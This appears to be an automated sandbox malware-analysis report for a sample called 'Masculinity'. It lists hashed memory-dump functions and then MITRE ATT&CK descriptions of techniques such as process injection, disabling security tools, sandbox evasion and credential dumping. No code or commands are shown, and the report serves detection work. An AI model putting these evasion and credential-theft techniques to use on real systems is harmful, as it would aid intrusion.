Opcode ID: d82a38438f74b23304f7600fc3c0764b9879958b3227cd01f92c5520c1b2f78c
Instruction ID: b7edc0f1531be3ba59e90e45600299b0646869e77f2ec0a8b44adb815241c66a
Opcode Fuzzy Hash: d82a38438f74b23304f7600fc3c0764b9879958b3227cd01f92c5520c1b2f78c
Instruction Fuzzy Hash: 3BD1A474E01218CFDB64DFA5C994B9EBBB2BF89300F1081A9D809AB365DB356D81CF51

Function 04ABB7F8 Relevance: .3, Instructions: 292COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3275505143.0000000004AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4ab0000_Masculinity.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2b1faa19b5e6d55f4f77c6d0c3c4ff357f7bf582a23c80d329acc2318561c103
Instruction ID: ad6efe728d90e5c8e67b945bd172b5190c61f39dff41d722c7a54aa168c65e29
Opcode Fuzzy Hash: 2b1faa19b5e6d55f4f77c6d0c3c4ff357f7bf582a23c80d329acc2318561c103
Instruction Fuzzy Hash: E2D1B474E01218CFDB64DFA5C994B9EBBB2BF89300F1081A9D809AB365DB356D81CF50

Function 04AB8CF0 Relevance: .3, Instructions: 292COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3275505143.0000000004AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4ab0000_Masculinity.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fc87856809902441c2d036ec60bb1f468dd5f4a60187cb010e924475240850a0
Instruction ID: 4b917add7a949a34fd98fae1c827087ba6adfaaffb6b0bdb6594f45be150006b
Opcode Fuzzy Hash: fc87856809902441c2d036ec60bb1f468dd5f4a60187cb010e924475240850a0
Instruction Fuzzy Hash: 84D19474E01218CFDB64DFA9C954B9EBBB2BF89300F1081A9D809AB365DB355D81CF51

Function 04ABE7C8 Relevance: .3, Instructions: 292COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3275505143.0000000004AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4ab0000_Masculinity.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ebf6a7d5880ebc17c4b56c8a0d5619e6f57a9da8430fb4dd5c6ca5950e922c9c
Instruction ID: 3521ae52566e6d4b5f6100aa645fea1ae4993a13222659b1c45becb4d61d24ca
Opcode Fuzzy Hash: ebf6a7d5880ebc17c4b56c8a0d5619e6f57a9da8430fb4dd5c6ca5950e922c9c
Instruction Fuzzy Hash: 9DD18274E01218CFDB65DFA5C994B9EBBB2BF89300F1081A9D809AB355DB355E81CF50

Function 04ABBCC0 Relevance: .3, Instructions: 292COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3275505143.0000000004AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4ab0000_Masculinity.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1f1ee84d7d3bc559118f9547bac651761c3e8258c8308db235d3155676afe166
Instruction ID: 8ebd34cb6ca13dc41bcfa205de0a4ed0ef0cacc501bc2f170dd003b67c07d862
Opcode Fuzzy Hash: 1f1ee84d7d3bc559118f9547bac651761c3e8258c8308db235d3155676afe166
Instruction Fuzzy Hash: 85D1A474E01218CFDB64DFA5C994B9EBBB2BF89304F1081A9D809AB365DB356D81CF50

Function 04ABA4D8 Relevance: .3, Instructions: 292COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3275505143.0000000004AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4ab0000_Masculinity.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c12e1da6971a3aa80cf84de364c48ac6f802906d6a6a816e92b43379c579d70b
Instruction ID: b5e55ddc1b9a4d542ee3e5d2b12d9f46f41f78b5675d519244503ffa76c00f3b
Opcode Fuzzy Hash: c12e1da6971a3aa80cf84de364c48ac6f802906d6a6a816e92b43379c579d70b
Instruction Fuzzy Hash: 14D1A374E01218CFDB64DFA5C994B9EBBB2BF89300F1081A9D849AB365DB355E81CF50

Function 04AB79D0 Relevance: .3, Instructions: 292COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3275505143.0000000004AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4ab0000_Masculinity.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8710a80c9026aa8da63f328ba6343589aea55093972c06c53fdaa07cffdf6945
Instruction ID: 211472e3c7ee6589d018bb392ef642941fe918424cdb73d712903b7aacc0ef1c
Opcode Fuzzy Hash: 8710a80c9026aa8da63f328ba6343589aea55093972c06c53fdaa07cffdf6945
Instruction Fuzzy Hash: E6D1A474E01218CFDB64DFA5C994B9EBBB2BF89300F1081A9D809AB365DB356D81CF51

Function 04AB8828 Relevance: .3, Instructions: 292COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3275505143.0000000004AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4ab0000_Masculinity.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e6bbb21ee90282520c6480957e0203017f78623c37968fbc7c6f92bc553a5ea3
Instruction ID: 3d4960ddfa4913a47605cd0939797eee4883f1e57c3553200700fd8754cc0dba
Opcode Fuzzy Hash: e6bbb21ee90282520c6480957e0203017f78623c37968fbc7c6f92bc553a5ea3
Instruction Fuzzy Hash: 5CD1B474E01218CFDB65DFA9C984B9EBBB2BF89300F1081A9D809AB365DB355D81CF50

Function 04ABF620 Relevance: .3, Instructions: 292COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3275505143.0000000004AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4ab0000_Masculinity.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d8f8859a2a31628091e70159951eb5e9ee678b7f257563033772baac1e4bd772
Instruction ID: b25da4c2c164b620ef92de493fe9415cc8e9221dbd4c9689b65393aebff11861
Opcode Fuzzy Hash: d8f8859a2a31628091e70159951eb5e9ee678b7f257563033772baac1e4bd772
Instruction Fuzzy Hash: 5FD1A374E01218CFDB64DFA5C994B9EBBB2BF89300F1081A9D809AB365DB355E81CF50

Function 04ABDE38 Relevance: .3, Instructions: 292COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3275505143.0000000004AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4ab0000_Masculinity.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aa789c697666b76a71bf8b7d97a5ea16eefa67e03aa680c084b9285721f9266b
Instruction ID: 836e88f23015864f8a3d2ec5c653af8167fbba11c6ed705d72fca4a49298ebb1
Opcode Fuzzy Hash: aa789c697666b76a71bf8b7d97a5ea16eefa67e03aa680c084b9285721f9266b
Instruction Fuzzy Hash: B2D19274E01218CFDB64DFA5C994B9EBBB2BF89304F1081A9D809AB355DB356D81CF50

Function 04ABB330 Relevance: .3, Instructions: 292COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3275505143.0000000004AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4ab0000_Masculinity.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 79ecd54a1f63a7efbd6d1c0e8ca25721545b5b1e26d0b955ce98962b113ed041
Instruction ID: d14e1c1b2013573cc2e300a9c81e07c09476125ab9bc025c5e6bc6d1f1d2bd6e
Opcode Fuzzy Hash: 79ecd54a1f63a7efbd6d1c0e8ca25721545b5b1e26d0b955ce98962b113ed041
Instruction Fuzzy Hash: 3AD19374E01218CFDB64DFA5C994B9EBBB2BF89300F1081A9D809AB365DB356D81CF51

Function 04AB7508 Relevance: .3, Instructions: 292COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3275505143.0000000004AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4ab0000_Masculinity.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 12a9833fae806f3cba87f4910c4b50fbb77eec80469060b2b89bb2e906a6943f
Instruction ID: c3ab78d1c23ffe7b0810d12ef8aa2a6a6851f2ae8caa4cf2d7a5b29a23599228
Opcode Fuzzy Hash: 12a9833fae806f3cba87f4910c4b50fbb77eec80469060b2b89bb2e906a6943f
Instruction Fuzzy Hash: 3ED1A374E01218CFDB64DFA5C994B9EBBB2BF89300F1081A9D809AB365DB356D81CF50

Function 04ABE300 Relevance: .3, Instructions: 292COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3275505143.0000000004AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4ab0000_Masculinity.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 73d7003c5b5b71f6d89a24ce26e5332137db848979e5c226c69952c3d51b0a3d
Instruction ID: 2683762dda52f8fef2ec299565d95e7d5930248791963c51a54f876d6721debd
Opcode Fuzzy Hash: 73d7003c5b5b71f6d89a24ce26e5332137db848979e5c226c69952c3d51b0a3d
Instruction Fuzzy Hash: 92D19174E012188FDB64DFA5C984BDEBBB2BF89304F1081A9D809AB365DB356D81CF50

Function 04ABCB18 Relevance: .3, Instructions: 292COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3275505143.0000000004AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4ab0000_Masculinity.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 23e99b80edc8c10f6bfdb47c60183f6f21a549d07f2416b703951ef0b26ec183
Instruction ID: c380898f812cfaefdb1a8876b1e5366b83ccd8445e9359b7c1d24602f4fe75d5
Opcode Fuzzy Hash: 23e99b80edc8c10f6bfdb47c60183f6f21a549d07f2416b703951ef0b26ec183
Instruction Fuzzy Hash: DED19474E01218CFDB64DFA5C994B9EBBB2BF89300F1081A9D849AB355DB356E81CF50

Function 04ABA010 Relevance: .3, Instructions: 292COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3275505143.0000000004AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4ab0000_Masculinity.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 284fffcb645a18742ee0a0d0a44cc45521b918700b7c55d034a7da35e8951df6
Instruction ID: 6db36eb27b2adcbf73df473d227bea128dd4e9ea6799cdb814b9eb6ab95becec
Opcode Fuzzy Hash: 284fffcb645a18742ee0a0d0a44cc45521b918700b7c55d034a7da35e8951df6
Instruction Fuzzy Hash: 3FD1A374E01218CFDB64DFA5C994B9EBBB2BF89300F1081A9D849AB365DB355E81CF50

Function 04AB2DA8 Relevance: .3, Instructions: 272COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3275505143.0000000004AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4ab0000_Masculinity.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6cc74eb52b51549cf13ea14751fdab32971583f17b32332d5bdedf65fe732787
Instruction ID: 41ad83604c250b427f1ca7cf4ba8dd2a2e262fee2ba0dce3d27eb2e2f986a78e
Opcode Fuzzy Hash: 6cc74eb52b51549cf13ea14751fdab32971583f17b32332d5bdedf65fe732787
Instruction Fuzzy Hash: 97D1C575E00218CFEB15DFA9C984B9DBBB2BF89300F1080A9D849AB365DB356D85CF51

Function 04AB56B8 Relevance: .3, Instructions: 272COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3275505143.0000000004AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4ab0000_Masculinity.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 46bf718416628201d3a64b7df3cb33cfe5f220d4c1949b1ba1d51fea3acfaffd
Instruction ID: 8ca4f67240b10880803157e52b770e32b81a4f5426613ed3bb6477467f440992
Opcode Fuzzy Hash: 46bf718416628201d3a64b7df3cb33cfe5f220d4c1949b1ba1d51fea3acfaffd
Instruction Fuzzy Hash: 8AD1B374E01218CFEB15DFA9C984B9DBBB2BF89304F1080A9D849AB365DB356D81CF51

Function 04AB2488 Relevance: .3, Instructions: 272COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3275505143.0000000004AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4ab0000_Masculinity.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a18fd1f20243fded31734d77207e7f4d21ea3a61e44dff36c7c7320c2f669739
Instruction ID: f69e3c2718618ccae2619ad9e62a6615c779fba46b37e01c31088ee8302c671c
Opcode Fuzzy Hash: a18fd1f20243fded31734d77207e7f4d21ea3a61e44dff36c7c7320c2f669739
Instruction Fuzzy Hash: A1D1C575E00218CFEB15DFA9C994B9DBBB2BF89300F1080A9D849AB365DB356D81CF51

Function 04AB1280 Relevance: .3, Instructions: 272COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3275505143.0000000004AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4ab0000_Masculinity.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 62ecb71d5f58e5ad8a1c1902203999298671f6340df2d8ef6dfb4aa850fd5152
Instruction ID: c3d9df38d6e6ff729d9fc0142190e0e68dab9ebcbf5a59a2f3d8887a05b508eb
Opcode Fuzzy Hash: 62ecb71d5f58e5ad8a1c1902203999298671f6340df2d8ef6dfb4aa850fd5152
Instruction Fuzzy Hash: 0CD1C578E00218CFDB55DFA9C994B9DBBB2BF89300F1080A9D849AB365DB356D81CF51

Function 04AB4D98 Relevance: .3, Instructions: 272COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3275505143.0000000004AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4ab0000_Masculinity.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 277ae9cfcdf46ee8f86a7d5bb72ac30dcb99a331b12b6232be31701c30371d8a
Instruction ID: d4e2f1e32923077aca5493dc788c15fc73295714d34783461c0489ea0959ebab
Opcode Fuzzy Hash: 277ae9cfcdf46ee8f86a7d5bb72ac30dcb99a331b12b6232be31701c30371d8a
Instruction Fuzzy Hash: 10D1B374E01218CFEB15DFA9C984B9DBBB2BF89304F1080A9D849AB365DB356D81CF51

Function 04AB3FE8 Relevance: .3, Instructions: 272COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3275505143.0000000004AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4ab0000_Masculinity.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0c58536ca3326404f7caa53c745a351f9019cd26e2f07c4ad64361a000161697
Instruction ID: cde1a20650461a629084e4d95c60a7b0834c895afb593532e7360d62fd4af0c5
Opcode Fuzzy Hash: 0c58536ca3326404f7caa53c745a351f9019cd26e2f07c4ad64361a000161697
Instruction Fuzzy Hash: DBD1B474E00218CFEB15DFA9C984B9DBBB2BF89300F1080A9D849AB365DB356D81CF51

Function 04AB1FF8 Relevance: .3, Instructions: 272COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3275505143.0000000004AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4ab0000_Masculinity.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c0dfe999ab56d861bcfa109da593c101d30a8d0a8954148883d8a0db7e36f091
Instruction ID: d2f49ec5aef3cda1484bb4113e3444df894d8deab368b90bc3e8fd3a8bbbdfc7
Opcode Fuzzy Hash: c0dfe999ab56d861bcfa109da593c101d30a8d0a8954148883d8a0db7e36f091
Instruction Fuzzy Hash: 16D1C479E00218CFDB15DFA9C984B9DBBB2BF89300F1080A9D849AB365DB356D81CF51

Function 04AB0DF0 Relevance: .3, Instructions: 272COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3275505143.0000000004AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4ab0000_Masculinity.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1b234bb4183bead4d4ebd5550bb1b73819498efdab7e8ea9377890dd5f2e1f93
Instruction ID: d111eaa34ddc33fcc1f48df151e127638ac9cef1bffb83caf5159bc99e9b21e4
Opcode Fuzzy Hash: 1b234bb4183bead4d4ebd5550bb1b73819498efdab7e8ea9377890dd5f2e1f93
Instruction Fuzzy Hash: 64D1B574E00218CFEB15DFA9C994B9DBBB2BF89300F1080A9D849AB365DB356D81CF51

Function 04AB36C8 Relevance: .3, Instructions: 272COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3275505143.0000000004AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4ab0000_Masculinity.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e81ee686681f91a8f0710b7f11432df31eb74bde5bbb7d481a4ca02cc460e9e3
Instruction ID: ec24a13178cf1248cfa3f128637bdd0151ebee7fa63423b7dd9f57bad67ed8d9
Opcode Fuzzy Hash: e81ee686681f91a8f0710b7f11432df31eb74bde5bbb7d481a4ca02cc460e9e3
Instruction Fuzzy Hash: A4D1C478E01218CFDB15DFA9C994B9DBBB2BF89300F1080A9D849AB365DB356D81CF51

Function 04AB04D0 Relevance: .3, Instructions: 272COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3275505143.0000000004AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4ab0000_Masculinity.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 31e01dc760ef75827d101735a96a2bc374b7e595cde2ab03146d938bd212d052
Instruction ID: c7c9c547681ae99c4b54dd601e4315c0fccad4a9a026ebf08d4a07febc7e81aa
Opcode Fuzzy Hash: 31e01dc760ef75827d101735a96a2bc374b7e595cde2ab03146d938bd212d052
Instruction Fuzzy Hash: 1FD1A575E00218CFDB15DFA9C984B9DBBB2BF89300F1080A9D849AB365DB356D81CF51

Function 04AB5228 Relevance: .3, Instructions: 272COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3275505143.0000000004AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4ab0000_Masculinity.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 920afb9c245216d7e395f4c4efa6f871513327b455c43a7751738528cde336a6
Instruction ID: e8987d0fe684c1ef7500c2bad4dddaa226376403ebeb49c8eab3d87cb40199ef
Opcode Fuzzy Hash: 920afb9c245216d7e395f4c4efa6f871513327b455c43a7751738528cde336a6
Instruction Fuzzy Hash: 22D1B374E00218CFEB15DFA9C994B9DBBB2BF89304F1080A9D849AB365DB356D81CF51

Function 04AB3238 Relevance: .3, Instructions: 272COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3275505143.0000000004AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4ab0000_Masculinity.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a83221f984ccd4d16d665462f68a5d43b94a3f2ce7296dfb87e853b227a18fbe
Instruction ID: aa3964aa6d4e1bdf16cf44d87729ceebac1ce0ec740bc9b18a6acc2904de4d27
Opcode Fuzzy Hash: a83221f984ccd4d16d665462f68a5d43b94a3f2ce7296dfb87e853b227a18fbe
Instruction Fuzzy Hash: B9D1B478E01218CFDB15DFA9C994B9DBBB2BF89300F1080A9D849AB365DB356D81CF51

Function 04AB4908 Relevance: .3, Instructions: 272COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3275505143.0000000004AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4ab0000_Masculinity.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c59e11529802643679fb021999a7bfb02e5a420c58ec01f3d3de880537368921
Instruction ID: 747280e9dd96af71189a05b21dfdde6282ce8c53a2c2660472e43edfae98889e
Opcode Fuzzy Hash: c59e11529802643679fb021999a7bfb02e5a420c58ec01f3d3de880537368921
Instruction Fuzzy Hash: B5D1B474E01218CFDB55DFA9C984B9DBBB2BF89300F1080A9D849AB365DB356D81CF51

Function 04AB2918 Relevance: .3, Instructions: 272COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3275505143.0000000004AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4ab0000_Masculinity.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dcc0b68114ca8c2bf5bba2d3ec17ab9333b834cab752bb97a5546297a3a79994
Instruction ID: f32be7cc80c2cdd4004ec4dc7afa1b0ae454c6148ca479482f3d42cab05100ee
Opcode Fuzzy Hash: dcc0b68114ca8c2bf5bba2d3ec17ab9333b834cab752bb97a5546297a3a79994
Instruction Fuzzy Hash: 3DD1B475E00218CFEB15DFA9C984B9DBBB2BF89300F1080A9D849AB365DB356D81CF51

Function 04AB1710 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3275505143.0000000004AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4ab0000_Masculinity.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6b6762c3e7f84ec0d55380b5db241e7f4a02e61b42f481b636a592fce33b25a0
Instruction ID: d18338e06d8d8ad7310388687b39e698fccdeab9d42b9ad0cb93100d066d0fda
Opcode Fuzzy Hash: 6b6762c3e7f84ec0d55380b5db241e7f4a02e61b42f481b636a592fce33b25a0
Instruction Fuzzy Hash: 11C1D475E00218CFDB14DFA5C994B9DBBB2BF89304F1081A9D809AB365DB356E85CF50

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
